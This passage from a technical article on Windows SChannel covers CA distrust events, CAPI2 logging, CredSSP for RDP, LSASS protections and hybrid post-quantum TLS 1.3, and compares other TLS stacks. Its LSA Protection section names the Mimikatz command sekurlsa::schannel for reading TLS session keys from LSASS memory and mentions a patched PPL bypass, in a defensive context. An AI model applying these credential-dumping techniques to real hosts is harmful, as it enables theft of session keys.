Two worked examples: DigiNotar (2011) and Symantec (2018)

The MTRP governance flow looks abstract until two real distrust events make it concrete.

DigiNotar -- August / September 2011 -- panic-mode revocation. Microsoft Security Advisory 2607712 ("Fraudulent Digital Certificates Could Allow Spoofing") was published on August 29, 2011 and updated through September 19 to version 5.0 [@ms-advisory-2607712-diginotar]. The Dutch CA DigiNotar's signing infrastructure had been breached by an attacker who issued fraudulent certificates for *.google.com and other high-value names. Microsoft, Mozilla, Apple, and Google removed DigiNotar's roots from their trust stores within days. The Microsoft-side propagation pushed the DigiNotar Root CA out of authrootstl.cab and added the relevant entries to disallowedcertstl.cab; clients on the Automatic Root Update pipeline picked up the change within the next refresh cycle. SChannel's chain engine then refused to validate any leaf signed under the DigiNotar hierarchy -- not because SChannel changed, but because the trust store it consults changed underneath it.

Symantec deprecation -- October 2018 -- planned per-NotBefore-date schedule. The Symantec distrust is the cleanest published example of how a CCADB-coordinated planned deprecation differs from a panic-mode revocation. Microsoft's October 4, 2018 Security Blog post documents the four-vendor (Microsoft, Mozilla, Apple, Google) coordinated schedule, keyed on the certificate's NotBefore date rather than on the root itself: per the per-root table in the blog post, the relevant cut-overs were September 30, 2018; January 31, 2019; and January 1, 2020 [@ms-blog-symantec-distrust]. Certificates issued before the per-root NotBefore date stayed trusted to their natural expiration; certificates issued after were rejected. The mechanism on the SChannel side is unchanged from DigiNotar -- the chain engine reads the updated trust posture from authrootstl.cab / disallowedcertstl.cab and applies it on the next chain build -- but the operational character is completely different: a years-long planned phase-out instead of a week-long emergency cleanup.

Note: A panic-mode distrust (DigiNotar) removes a root outright and propagates over days. A planned distrust (Symantec) uses NotBefore dates to grandfather pre-existing certificates while rejecting new ones, propagates over months to years, and gives the broader industry time to migrate. Both flow through the same authrootstl.cab / disallowedcertstl.cab plumbing. The governance subtlety lives in which kind of distrust the program issues for a given CA's circumstances.

Enterprise observability: CAPI2/Operational event IDs

The governance flow ends at the operator's host -- but only if the operator can see it land. The Microsoft Learn troubleshooting article on the May 24, 2022 removal of the U.S. Federal Common Policy CA "G1" root carries the canonical observability recipe [@ms-learn-fcpca-removal]. On any Windows host you can enable the per-event tracing channel with wevtutil sl Microsoft-Windows-CAPI2/Operational /e:true and then watch the Event Viewer under Applications and Services Logs > Microsoft > Windows > CAPI2 > Operational for the chain-engine events that the FCPCA-removal article enumerates verbatim [@ms-learn-fcpca-removal]: Event ID 90 logs every certificate consulted during chain building, Event ID 11 records chain-build failures, Event ID 30 records SSL or NTAuth policy-layer failures, Events 40-43 show stored CRLs and AIA paths, and Events 50-53 show network CRL accesses. The same article documents the empirical post-distrust propagation window in plain language: "Applications and operations that depend on the 'G1' root certificate will fail one to seven days after they receive the root certificate update." That one-to-seven-day window is the realistic latency budget between an MTRP distrust event landing in authrootstl.cab and a given Windows host actually applying it -- a fingerprint operators can validate per host, not just per the rollout calendar.

The PowerShell complement is brief and worth keeping in the muscle memory: Get-ChildItem Cert:\LocalMachine\AuthRoot enumerates the currently-trusted roots; Get-ChildItem Cert:\LocalMachine\Disallowed enumerates the disallowed store; both reflect whatever the last crypt32.dll Automatic Root Update cycle left in place.

A cautionary tale: CVE-2020-0601, "Curveball"

In January 2020 the NSA disclosed a chain-engine spoofing vulnerability in crypt32.dll's ECC certificate validation [@nvd-cve-2020-0601][@nsa-curveball-alternative]. The bug let an attacker craft a fraudulent ECC certificate that the Windows chain engine would treat as having been signed by a trusted root, by failing to fully verify the curve parameters against the cached trusted root's curve. Curveball is strictly a crypt32.dll bug, not a SChannel SSP bug -- but it shaped the SChannel posture in two ways. First, it demonstrated that the chain engine and the SSP are equally load-bearing for "is this TLS connection trustworthy?" Second, it was the most prominent example of the NSA disclosing a Windows vulnerability via the regular MSRC channel rather than hoarding it. Microsoft's January 2020 Patch Tuesday cycle addressed CVE-2020-0601 ahead of any public proof-of-concept.

Note: The agility property the rest of this article celebrates is a property of CNG and SChannel. The trust pipeline -- CertGetCertificateChain, CertVerifyCertificateChainPolicy, the trust-store update mechanism in crypt32.dll -- is a parallel concern. A perfectly executed TLS 1.3 handshake against a trusted-looking certificate that is actually fraudulent is still a compromise. Curveball is the canonical reminder that audit posture for SChannel-served endpoints has to cover both halves.

Certificate validation is the other axis on which SChannel has had to evolve. With the substrate (Sections 4 through 6) and the trust pipeline (this section) both stabilised, the article now turns to what "modern SChannel" actually looks like in the field -- TLS 1.3 on by default, TPM-backed server keys available for compliance scenarios, and the LSA-protection moat that makes session-key extraction harder than it used to be.

8. Modern SChannel: TLS 1.3, CredSSP for RDP, TPM-Backed Keys, and the LSASS Moat

By mid-2026 a default Windows 11 or Server 2022 / 2025 box is doing things its 2019 equivalent could not. TLS 1.3 is on. CredSSP wraps the RDP credential-delegation path inside a SChannel-protected TLS tunnel [@ms-cssp-landing]. The TPM is available as a key custodian. LSASS is a Protected Process; on most newer Windows 11 builds, Credential Guard is on by default. These are not four independent stories; they are four layers of the same defence-in-depth posture for the modern SChannel-served TLS endpoint.

TLS 1.3 in SChannel

RFC 8446 (Eric Rescorla, Mozilla, August 2018) [@rfc-8446] is the protocol generation that SChannel finally ships default-on in Windows Server 2022 (GA August 2021) and Windows 11 (GA October 5, 2021). Windows 10 and Windows Server 2019 SChannel remain TLS 1.2 only -- a fact worth naming because it is the most common cause of confusion in mixed-version Windows fleets [@ms-learn-tls-cipher-suites-server-2022].

What changed at the wire-format level matters less for SChannel than how cleanly the changes mapped through CNG. TLS 1.3 shrank the cipher-suite menu to three AEAD suites: TLS_AES_128_GCM_SHA256, TLS_AES_256_GCM_SHA384, and TLS_CHACHA20_POLY1305_SHA256 [@rfc-8446]. The key-share namespace separated from the cipher-suite namespace -- supported_groups (X25519, secp256r1, secp384r1, and now X25519MLKEM768) is an independent extension from cipher_suites. The handshake collapsed to one round trip.The 0-RTT (early data) feature of TLS 1.3 trades a round trip for replay-resistance complexity. SChannel's posture on 0-RTT is conservative: clients can request it, servers default to off unless explicitly opted in, and the documentation flags the replay-protection trade-offs.

The downgrade-resistance sentinel in ServerHello.random (RFC 8446 §4.1.3) is worth a beat. A TLS 1.3 server that, for whatever reason, is negotiated down to TLS 1.2 or below by middlebox interference fills the last eight bytes of its ServerHello.random with one of two well-known sentinels (44 4F 57 4E 47 52 44 01 for "downgraded from 1.3 to 1.2"; 44 4F 57 4E 47 52 44 00 for "downgraded from 1.3 to 1.1 or earlier"). A genuinely TLS 1.3-capable client checks for the sentinel after the handshake and aborts on mismatch. This puts the active-downgrade-attack envelope inside TLS 1.3 at a much narrower place than it was in TLS 1.2.

sequenceDiagram participant App as Application participant SC as SChannel SSP participant CNG as BCrypt / NCrypt participant Peer as Remote endpoint

App->>SC: AcquireCredentialsHandle (server cert, key handle)
App->>SC: InitializeSecurityContext (first call)
SC->>CNG: BCrypt ECDH or MLKEM key share
SC->>Peer: ClientHello (cipher_suites, supported_groups, key_share)
Peer-->>SC: ServerHello, EncryptedExtensions, Certificate, CertVerify, Finished
SC->>CNG: NCryptSignHash or NCrypt key derive
SC->>App: SECBUFFER tokens, then SEC_E_OK
App->>SC: EncryptMessage and DecryptMessage on every record

CredSSP and the Remote Desktop NLA path

The SSPI provider in `credssp.dll` that securely delegates Windows credentials from a client to a target server inside a TLS-protected tunnel. CredSSP is the SSP that backs Remote Desktop Network Level Authentication (RDP NLA): it wraps a SChannel TLS handshake, tunnels an SPNEGO / Kerberos / NTLM authentication inside that tunnel, performs a channel-binding hash exchange, and finally transmits the user's credential material to the destination encrypted under the SSPI session key [@ms-cssp-landing][@ms-cssp-glossary].

The Microsoft Open Specifications page for the Credential Security Support Provider Protocol ([MS-CSSP], version 21.0, April 2024) [@ms-cssp-landing] defines the protocol that backs Remote Desktop NLA. CredSSP is not a TLS protocol of its own; it is an SSP that uses SChannel as its transport. The relationship is structural -- CredSSP is one of the most consequential consumers of SChannel inside Windows, and almost every RDP session opened against a modern Windows host runs the CredSSP-over-SChannel sequence before the RDP video stream even starts.

The five-step CredSSP-over-TLS sequence per the open-spec "Processing Events and Sequencing Rules" page [@ms-cssp-sequencing]:

TLS handshake. The CredSSP client and CredSSP server complete the SChannel TLS handshake; only the server presents a certificate, so the TLS-layer client is anonymous. After this step, all subsequent CredSSP messages are encrypted by the TLS channel. The MS-CSSP spec is explicit that "the CredSSP Protocol does not extend the TLS wire protocol" and that "TLS session resumption is not supported" [@ms-cssp-sequencing].
SPNEGO / Kerberos / NTLM tunnelled inside TLS. Authentication tokens are carried in the negoTokens field of the protocol's TSRequest ASN.1 structure. The negotiation is performed by the SSPI Negotiate provider, which usually selects Kerberos when the client is domain-joined and falls back to NTLM otherwise.
Public-key (channel-binding) hash exchange. This is the post-CVE-2018-0886 mechanism. The client computes a SHA-256 hash over a fixed magic string concatenated with a nonce and the server's SubjectPublicKey, encrypts that hash under the SSPI session key established in step 2, and sends it in the pubKeyAuth field of TSRequest. The earlier (v2 / v3 / v4) "encrypt the public key + 1" scheme that was broken by CVE-2018-0886 has been replaced by this channel-binding hash for protocol versions 5 and 6 of CredSSP.
Server-side hash response with the server magic. The server computes its own version of the hash (using a different fixed magic string for the server-to-client direction), encrypts it under the session key, and returns it in its own pubKeyAuth. Both sides have now proven they hold the same session key bound to the same server public key, which closes a class of man-in-the-middle attacks against the inner authentication.
Encrypted credential transfer in authInfo. The credentials themselves -- a TSPasswordCreds, TSSmartCardCreds, or TSRemoteGuardCreds structure depending on the chosen logon style -- are encrypted under the SSPI session key and transmitted in the authInfo field. The destination decrypts them inside lsass.exe (a PPL-protected process when RunAsPPL is enabled, see below), and the operating system then uses them to log the user on.

sequenceDiagram participant Client as RDP client participant Server as RDP server Note over Client,Server: Step 1 -- SChannel TLS handshake, server cert only, client anonymous at TLS layer Client->>Server: ClientHello Server-->>Client: ServerHello, Certificate, ServerHelloDone (TLS 1.2) or one-RTT TLS 1.3 equivalent Client->>Server: Finished -- TLS tunnel up Note over Client,Server: Step 2 -- SPNEGO Kerberos or NTLM tokens inside TSRequest.negoTokens, all inside TLS Client->>Server: TSRequest with negoTokens (Kerberos AP-REQ or NTLM Type 1) Server-->>Client: TSRequest with negoTokens (Kerberos AP-REP or NTLM Type 2 then 3) Note over Client,Server: Step 3 -- channel-binding hash, client side (replaces broken pre-CVE-2018-0886 scheme) Client->>Server: TSRequest.pubKeyAuth -- E(sessionKey, SHA256(client-magic, nonce, server SubjectPublicKey)) Note over Client,Server: Step 4 -- server-side hash response with server-magic Server-->>Client: TSRequest.pubKeyAuth -- E(sessionKey, SHA256(server-magic, nonce, server SubjectPublicKey)) Note over Client,Server: Step 5 -- encrypted credentials in TSRequest.authInfo Client->>Server: TSRequest.authInfo -- E(sessionKey, TSPasswordCreds or TSSmartCardCreds or TSRemoteGuardCreds) Note over Server: lsass.exe decrypts, logs the user on

The NLA threat-model framing per the archived Server 2008 R2 TechNet content is worth quoting because it captures what NLA actually buys [@ms-archive-nla]. NLA forces user authentication before RDP session resources are allocated: "It requires fewer remote computer resources initially. The remote computer uses a limited number of resources before authenticating the user, rather than starting a full remote desktop connection as in previous versions. It can help provide better security by reducing the risk of denial-of-service attacks." The two concrete payoffs are pre-auth DoS resistance and pre-auth RDP-codepath RCE mitigation. BlueKeep (CVE-2019-0708) and DejaBlue (CVE-2019-1181 / 1182) would each have been substantially harder to exploit on NLA-enabled hosts because the vulnerable RDP code paths sit behind the NLA gate. NLA has been on by default for RDP Session Hosts since Windows Server 2012 R2.

Note: A naive TLS-only deployment authenticates the server to the client via the server certificate, and authenticates the user in plaintext above TLS. CredSSP adds a second layer: the user's authentication runs inside the TLS tunnel via SPNEGO / Kerberos / NTLM, and the user's credentials -- if delegated at all -- are encrypted under a session key that is channel-bound to the server's public key. With Remote Credential Guard (TSRemoteGuardCreds), the destination's plaintext-credential exposure can be reduced to zero -- the destination receives only a service ticket usable for the session, not a reusable password hash.

TPM-backed server keys via the Microsoft Platform Crypto Provider

The Microsoft Platform Crypto Provider (PCP) is a KSP that stores private keys non-exportable inside TPM 2.0. For an IIS or SslStream server, switching to a PCP-backed certificate means the certificate's private key never resides in software memory; CertificateVerify signing during the handshake dispatches through NCryptSignHash to PCP to TPM2_Sign.

Two caveats need stating plainly. First, PCP-backed key operations are slower than software-backed key operations -- TPM 2.0 ECDSA / RSA signing latency is in the tens of milliseconds, which is a hard cap on handshake throughput. A high-volume edge IIS workload cannot meet its handshake-rate SLA with TPM-backed keys. Second, production prevalence of PCP-backed server keys remains low outside specific compliance scenarios. The capability is shipping; the typical pattern is software-backed keys at the edge and TPM-backed keys for long-lived service-identity certificates where the latency does not dominate.TPM 2.0 signing latency is the ceiling for TPM-backed TLS handshake throughput. A high-volume IIS edge cannot meet handshake-rate SLAs with TPM-backed keys; that is why the typical pattern is software-backed keys at the edge and TPM-backed keys for service identity at lower call rates.

LSA Protection (RunAsPPL) and Credential Guard

A Windows process-protection lattice where a "protected" process can be opened for certain rights only by callers whose protection level is greater than or equal to the target's. When LSASS runs as a PPL (via `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL`), a non-PPL caller's `OpenProcess(LSASS, PROCESS_VM_READ, ...)` returns `ERROR_ACCESS_DENIED`. PPL is a same-privilege gate: it operates entirely inside Virtual Trust Level 0 (VTL0), the normal kernel/user world [@ms-learn-lsa-protection][@itm4n-runasppl].

LSASS holds the cleartext session keys SChannel derives for each active TLS connection. Historically Mimikatz's sekurlsa::schannel command read those keys directly out of LSASS memory after a debug-privilege OpenProcess. Once RunAsPPL is enforced, the read fails: a non-PPL Mimikatz cannot open LSASS for memory read [@ms-learn-lsa-protection].

Clément Labro's RunAsPPL analysis (itm4n) is the canonical practitioner's text on the gotchas [@itm4n-runasppl]. The single most important framing point Labro makes is the disambiguation between PPL and Credential Guard:

When it comes to protecting against credentials theft on Windows, enabling LSA Protection (a.k.a. RunAsPPL) on LSASS may be considered as the very first recommendation to implement... Credential Guard and LSA Protection are actually complementary. -- Clément Labro, *Do You Really Know About LSA Protection (RunAsPPL)?* [@itm4n-runasppl]

The disambiguation matters because the two mechanisms operate at different layers. PPL is a same-privilege gate inside VTL0. Credential Guard moves credential material into the LSAIso trustlet at VTL1, behind the VBS / Hyper-V boundary -- a cross-privilege isolation that PPL cannot provide [@ms-learn-credential-guard]. The misconception that Credential Guard alone defeats mimikatz sekurlsa::schannel is one of the most common operator errors in this space. They stack. They are not substitutes.

flowchart TB subgraph VTL0["VTL0 -- Normal World"] subgraph User["User mode"] App["Mimikatz / arbitrary code -- non-PPL"] end subgraph Kern["Kernel mode (NT kernel)"] LSASS["LSASS -- PPL when RunAsPPL=1"] SCh[schannel.dll loaded in LSASS] end end subgraph VTL1["VTL1 -- Isolated User Mode (VBS)"] LSAIso["LSAIso trustlet -- Credential Guard"] end App -. "OpenProcess(LSASS, VM_READ) -- denied when PPL on" .-> LSASS LSASS -. "RPC to LSAIso for credential ops" .-> LSAIso SCh --> LSASS

The last open question on RunAsPPL is whether the protection itself is bypassable. The honest answer is "less so than it used to be." Labro's follow-up "The End of PPLdump" walks through how a 2021-era SymLink + KnownDlls trick that defeated PPL was patched, and how the post-patch PPL invariant holds for current Windows servicing branches [@itm4n-ppldump]. Combined with HVCI and VBS-on-by-default in newer Windows 11 builds, the modern SChannel session key is genuinely harder to lift than it was in 2019.

Operators frequently set `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL = 1` and stop there. Microsoft's Configure-Added-LSA-Protection doc walks through the additional values (`RunAsPPLBoot` for the boot-level enforcement, the corresponding UEFI variable for tamper resistance) that complete the posture [@ms-learn-lsa-protection]. The minimum recommended configuration is not a single value in a single hive; reading the official doc end to end is faster than rediscovering this from a bug report.

Modern SChannel is the substrate plus the trust pipeline plus the CredSSP RDP wrapper plus the LSASS moat. The one piece still in flight as of mid-2026 is the cryptographic primitive nobody had in 2009 -- the post-quantum hybrid key exchange.

9. The Post-Quantum Pivot: ML-KEM, SymCrypt, and Hybrid TLS 1.3

On August 13, 2024, NIST published FIPS 203 -- the standard for ML-KEM, the first quantum-resistant key-encapsulation mechanism the United States government endorses for production use [@fips-203]. The standard defines three parameter sets (ML-KEM-512, ML-KEM-768, ML-KEM-1024) with security grounded in the Module Learning With Errors problem. The SymCrypt CHANGELOG entry for v103.5.0 reads, verbatim: "Add ML-KEM per final FIPS 203" [@symcrypt-changelog]. That single line is what the receipts on Microsoft's twenty-year algorithm-agility bet look like in the present tense.

A **KEM** is a public-key construction that, given a recipient's public key, produces a (ciphertext, shared-secret) pair such that the recipient can recover the shared secret from the ciphertext using its private key. ML-KEM is the NIST-standardised KEM derived from the CRYSTALS-Kyber proposal; ML-KEM-768 generates a 1184-byte public key and a 1088-byte ciphertext and produces a 32-byte shared secret. FIPS 203 [@fips-203] is the final standard; SymCrypt v103.5.0 is the first SymCrypt release shipping ML-KEM per that standard [@symcrypt-changelog].

What is shipping

The PQC primitives Microsoft has rolled into SymCrypt are publicly tracked in the project CHANGELOG [@symcrypt-changelog]:

v103.5.0 -- ML-KEM (FIPS 203) [@fips-203].
v103.6.0 -- LMS (NIST SP 800-208 stateful hash-based signature) and AES-KW(P).
v103.7.0 -- ML-DSA (FIPS 204) [@fips-204].
v103.11.0 -- Composite ML-KEM (hybrid ML-KEM with a classical KEM).
v103.12.0 -- Composite ML-DSA (hybrid ML-DSA with a classical signature scheme).
v103.12.1 -- AVX-512 AES-GCM (up to ~35% throughput improvement).

CNG exposes the matching BCRYPT_MLKEM_ALG_HANDLE with parameter-set selectors -- BCRYPT_MLKEM_PARAMETER_SET_768, BCRYPT_MLKEM_PARAMETER_SET_1024, and so on [@ms-learn-cng-mlkem-examples]. The Microsoft Learn page for the CNG ML-KEM API surface carries an explicit "prerelease product / Windows Insider Preview" banner. The article therefore frames SChannel's PQC support as preview / Insider-channel as of mid-2026, with broader GA rollout in flight; the Microsoft Tech Community PQC announcement (December 2024) is the narrative anchor and the Insider-Preview banner on the API doc is the technical hedge [@ms-tech-community-pqc][@ms-tech-community-pqc-companion].

The hash-based and stateless-hash-based signature side of PQC (SLH-DSA, FIPS 205 [@fips-205]) is shipping in SymCrypt and CNG along the same trajectory. Section 11 returns to why the signature-side PQC transition is harder than the KEM-side transition.

Hybrid TLS 1.3 key exchange: `X25519MLKEM768`

The IETF-converged named group for the most-deployed hybrid is X25519MLKEM768, defined in draft-ietf-tls-ecdhe-mlkem (Kris Kwiatkowski / PQShield, Panos Kampanakis / AWS, Bas Westerbaan / Cloudflare, Douglas Stebila / University of Waterloo; currently -05 as of May 26, 2026) [@draft-ietf-tls-ecdhe-mlkem]. The draft also defines SecP256r1MLKEM768 and SecP384r1MLKEM1024 for deployments that prefer NIST curves over X25519.

The handshake mechanics are clean. The client sends mlkem_pk || x25519_pk (1184 + 32 = 1216 bytes) in its key_share; the server responds with mlkem_ct || x25519_pk (1088 + 32 = 1120 bytes); both sides compute shared_secret = mlkem_ss || x25519_ss (32 + 32 = 64 bytes) and feed that into TLS 1.3's HKDF-Extract as IKM.

sequenceDiagram participant Client participant Server

Note over Client: Generate X25519 keypair and ML-KEM-768 keypair
Client->>Server: ClientHello with key_share (mlkem_pk concatenated with x25519_pk -- 1216 B)
Note over Server: Generate X25519 keypair, ML-KEM encapsulate to client mlkem_pk
Server->>Client: ServerHello with key_share (mlkem_ct concatenated with x25519_pk -- 1120 B)
Note over Client: X25519 DH, ML-KEM decapsulate
Note over Client,Server: shared_secret -- mlkem_ss concatenated with x25519_ss (64 B)
Note over Client,Server: HKDF-Extract over shared_secret continues TLS 1.3 key schedule

The construction is defence-in-depth against either a classical-only break or a quantum-only break: an adversary must defeat both X25519 and ML-KEM-768 to recover the session key, and the hybrid analysis (Bindel et al., PQCrypto 2019) shows the construction is at least as secure as the stronger of the two components. The minor cost is the inflated ClientHello and ServerHello (about 1.2 KB extra) and a couple of milliseconds of ML-KEM operations.

{` // Pseudocode for the X25519MLKEM768 shared-secret concatenation. // In real SChannel: BCryptSecretAgreement(BCRYPT_ECDH_P256_ALGORITHM_HANDLE / X25519, ...) // + BCryptDecapsulate(BCRYPT_MLKEM_ALG_HANDLE, parameter_set = 768, ...)

function x25519_dh(privA, pubB) { return new Uint8Array(32).fill(0xAA); } // 32 B function mlkem768_decaps(privA, ct) { return new Uint8Array(32).fill(0xBB); } // 32 B

const x25519_ss = x25519_dh('clientX25519Priv', 'serverX25519Pub'); const mlkem_ss = mlkem768_decaps('clientMLKEMPriv', 'serverMLKEMCt');

const hybrid_secret = new Uint8Array(64); hybrid_secret.set(mlkem_ss, 0); hybrid_secret.set(x25519_ss, 32);

console.log('IKM length for HKDF-Extract:', hybrid_secret.length, 'bytes'); console.log('First byte: 0x' + hybrid_secret[0].toString(16), '(from ML-KEM half, defends against quantum break)'); console.log('Byte 32: 0x' + hybrid_secret[32].toString(16), '(from X25519 half, defends against classical break)'); `}

The agility payoff

This rotation is the cleanest demonstration of Section 4's thesis. Adding X25519MLKEM768 to SChannel required: (a) a SymCrypt primitive (v103.5.0+ for ML-KEM, with X25519 long present per RFC 7748 [@rfc-7748]); (b) a new BCrypt provider registration (BCRYPT_MLKEM_ALG_HANDLE and the hybrid named-group plumbing); (c) a new SChannel named-group entry. No IIS source change. No SQL Server source change. No SslStream source change. Eighteen years after Vista shipped CNG, the substrate is producing receipts for a brand-new algorithm family.

The deployment side is moving faster than most ten-year forecasts in cryptography ever predicted. Cloudflare's measurements (March 2024) put PQC-secured TLS 1.3 connections at "nearly two percent" of inbound, with the team forecasting double-digit percentages by end of 2024 [@cloudflare-pq-2024]. Cloudflare's origin-side PQC rollout has been live since September 2023 [@cloudflare-pq-origins]. Chrome / BoringSSL, Edge (via BoringSSL), and Firefox / NSS ship X25519MLKEM768 client-side. OpenSSL 3.5 ships ML-KEM. Server-side SChannel adoption is rolling through the Insider channel and the official Tech Community posts as of mid-2026 [@ms-learn-cng-mlkem-examples][@ms-tech-community-pqc-companion].Cloudflare's measurements (March 2024) put PQC-secured TLS 1.3 connections at "nearly two percent" of their inbound; by the end of 2024 they expected double-digit percentages [@cloudflare-pq-2024]. The transition is moving faster than most ten-year forecasts in cryptography ever predicted.

Note: The hybrid PQC handshake is cheap in absolute terms but the cost is not uniform across deployment shapes. On a typical Server 2022 IIS edge with software-backed RSA-2048 plus AES-NI, sustained handshake rates run in the thousands per second per core; the X25519MLKEM768 hybrid adds roughly 5-10 ms of handshake latency, which is in the noise relative to the per-handshake cost of an RSA-2048 signature. On a TPM-key-bound edge the picture inverts: the Microsoft Platform Crypto Provider is serialised by TPM 2.0 TPM2_Sign latency (tens of milliseconds per signature), so sustained handshake rates sit in the tens to roughly one hundred handshakes per second per host, and the same ~5-10 ms hybrid delta becomes a non-trivial fraction of the per-handshake budget. AES-NI bulk throughput on AES-256-GCM is roughly 5-10 Gbps per core (the AVX-512 AES-GCM landing in SymCrypt v103.12.1 shifts that ceiling further [@symcrypt-changelog]) so the post-handshake data path is not the bottleneck. Operator decision support: if you are software-key-bound, the hybrid PQC delta is noise. If you are TPM-key-bound, your handshake rate is already in the tens, and the hybrid delta is meaningful enough to budget for.

Note: As of article publication (mid-2026), SChannel's X25519MLKEM768 support is preview / Insider-channel; the CNG ML-KEM page carries the explicit Windows Insider Preview banner [@ms-learn-cng-mlkem-examples]. Track the SymCrypt CHANGELOG for primitive landings [@symcrypt-changelog] and the Microsoft Tech Community PQC posts for OS-channel GA announcements [@ms-tech-community-pqc]. Do not assert GA dates that have not landed.

If the PQC rotation is the agility payoff, the next question is the obvious one: how does SChannel's answer compare to the other TLS stacks shipping on the same calendar? OpenSSL, BoringSSL, NSS, and Apple's Network framework have all had to solve the same algorithm-agility problem -- and they have all made different trade-offs.

10. Competing Approaches: How Other TLS Stacks Solve Algorithm Agility

Algorithm agility is not a property of TLS-the-protocol. It is a property of the substrate underneath the protocol. Every major TLS implementation has had to answer the same question -- "how do we add a new primitive without breaking our consumers?" -- and the answers are surprisingly different.

Stack	Substrate model	Stability commitment	PQC integration as of mid-2026
SChannel / CNG	BCrypt providers + NCrypt KSPs; Win32 API-stable [@ms-learn-cng-portal]	Strong: Win32 SSPI surface frozen	ML-KEM in SymCrypt v103.5.0 [@symcrypt-changelog]; `X25519MLKEM768` Insider Preview [@ms-learn-cng-mlkem-examples]
OpenSSL 3.x	`OSSL_PROVIDER` modules via `OSSL_DISPATCH` arrays [@openssl-provider7-3.0]	Strong-by-major-version	OQS-Provider for early PQC; ML-KEM in OpenSSL 3.5
BoringSSL	Single source tree; "rolling release"; no provider model [@boringssl-readme]	Explicitly none ("no guarantees of API or ABI stability")	`X25519MLKEM768` shipping; consumer vendoring required
NSS	OASIS PKCS #11 v3.1 modules via `CK_FUNCTION_LIST` [@nss-3.111-release-notes][@oasis-pkcs11-v3.1]	Strong (Firefox compatibility)	ML-KEM via PKCS #11 v3.1 `C_Encapsulate` / `C_Decapsulate`; `X25519MLKEM768` in Firefox 132
Apple Network framework / Secure Transport	Framework-version pinning per OS release [@apple-network-framework][@apple-secure-transport]	Strong per OS version	Hybrid KEM shipping in newer Network framework releases
.NET `SslStream` cross-platform	Delegates to host OS stack [@dotnet-cross-platform-crypto]	Strong per .NET version	Inherits underlying stack's PQC support

OpenSSL 3.x: `OSSL_PROVIDER`, explicit contexts, three in-tree providers

OpenSSL 3.0 replaced the older ENGINE model with the OSSL_PROVIDER system, described in the provider(7) manpage as "a unit of code that provides one or more implementations for various operations for diverse algorithms" [@openssl-provider7-3.0]. A provider exposes its operations through an OSSL_DISPATCH array of {function-id, function-pointer} pairs. The loader's entry point is a single exported function with this exact signature [@openssl-provider7-3.0]:

int OSSL_provider_init(const OSSL_CORE_HANDLE *handle,
                       const OSSL_DISPATCH *in,
                       const OSSL_DISPATCH **out,
                       void **provctx);

The in array gives the provider the callbacks the OpenSSL library is willing to provide to the provider (logging, error reporting, library-context queries, parameter accessors) [@openssl-provider-base7-3.0]; the out array is filled in by the provider with the operations it implements. The provctx is the provider's own per-instance state.

OpenSSL 3.0 ships three in-tree providers: default (the modern algorithm set), legacy (RC4, MD4, IDEA, and other backward-compatibility primitives), and FIPS (the FIPS 140-3-validated subset). Out-of-tree, the OQS-Provider plugs PQC primitives into OpenSSL without recompiling the OpenSSL build itself. The substantive contrast with CNG: OpenSSL makes the provider context an explicit parameter via OSSL_LIB_CTX *, which means multiple isolated provider sets can coexist inside one process (a FIPS-validated workload and a legacy workload in the same binary). CNG keeps provider dispatch global per-process. Both models are functionally agile; OpenSSL's is more compositional at runtime, while CNG's is more governed through the Windows servicing branch.

BoringSSL's anti-agility position

BoringSSL is Google's TLS stack used by Chromium and (via Chromium) Microsoft Edge. The project README says, verbatim:

Although BoringSSL is an open source project, it is not intended for general use, as OpenSSL is. We don't recommend that third parties depend upon it. Doing so is likely to be frustrating because there are no guarantees of API or ABI stability. -- BoringSSL README [@boringssl-readme]

BoringSSL achieves agility by refusing to absorb it as a public API. Consumers vendor BoringSSL into their own build tree and accept the lift of tracking head. Chromium does this; Edge inherits it; cURL ships configurations that link against BoringSSL when the consumer asks for it. The model is the inverse of CNG's: maximum velocity for the maintainer, maximum churn for the consumer. For a vendor whose chief constraint is API stability for the Win32 / .NET universe, BoringSSL's model is structurally incompatible. For a vendor whose chief constraint is shipping the modern internet's TLS posture into a browser monthly, BoringSSL's model is the right answer.

NSS and PKCS #11

Mozilla's NSS predates almost every other stack here and uses the OASIS PKCS #11 (Cryptoki) module standard as its agility hinge [@oasis-pkcs11-v3.1]. A PKCS #11 module exposes a single entry point, C_GetFunctionList(CK_FUNCTION_LIST_PTR_PTR ppFunctionList), which returns a table of roughly seventy function pointers. Those functions are organised around a three-level hierarchy: a slot is a place where a token sits; a token holds objects (keys, certificates, data); cryptographic operations are invoked against an object referenced by CK_OBJECT_HANDLE and parametrised by a CK_MECHANISM (e.g. CKM_AES_GCM, CKM_ECDH1_DERIVE).

NSS itself ships two PKCS #11 modules out of the box: the NSS softoken (softokn3, in-process software primitives) and the NSS FIPS softoken (the FIPS-validated variant). Hardware PKCS #11 modules for HSMs and smart cards load through the same SECMOD_LoadUserModule API. PQC arrived in NSS via PKCS #11 v3.1's KEM operations: C_Encapsulate and C_Decapsulate are standardised verbs that ML-KEM-768 implementations can expose without needing the historic CKM_VENDOR_DEFINED mechanism-ID reservation pattern. NSS 3.111 (released April 28, 2025) is the release marker for full PKCS #11 v3.1 adoption in NSS [@nss-3.111-release-notes]; Firefox shipped X25519MLKEM768 client-side in Firefox 132 (October 2024). The high-order contrast with CNG: PKCS #11 is a cross-vendor industry standard, so the same NSS / Firefox runtime can talk to a Mozilla softoken, an HSM module, and a smart-card module through a single interface; CNG is single-vendor (Microsoft) but exposes a fully Microsoft-curated provider universe through a stable Win32 API.

Apple Network framework and CryptoKit

Apple's TLS-stack history splits into the deprecated Secure Transport API [@apple-secure-transport] and the modern Network framework introduced in macOS 10.14 and iOS 12 [@apple-network-framework]. Secure Transport's design was C-API and typed-enum: SSLProtocol selected the TLS version; SSLCipherSuite integers were the IANA cipher-suite codepoints; the developer worked with SSLContextRef handles much as a Windows developer works with CtxtHandle. The agility model was named-enum-per-OS-release: every TLS version and cipher was a compile-time constant, and the SDK version the application was built against determined what was selectable.

Network framework moved the API to a Swift-first surface (NWProtocolTLS.Options, sec_protocol_options_set_min_tls_protocol_version) and started Apple's deprecation glide for Secure Transport. On top of the network-layer primitives, CryptoKit (iOS 13 / macOS 10.15) provides the Swift-idiomatic high-level crypto API for symmetric AEAD, ECDH, ECDSA, and (via subsequent OS releases) the post-quantum primitives [@apple-cryptokit]. The cadence is bound to Apple's annual OS release: a new algorithm becomes available when the OS that ships it becomes available, and applications that need it bump their minimum-deployment target.

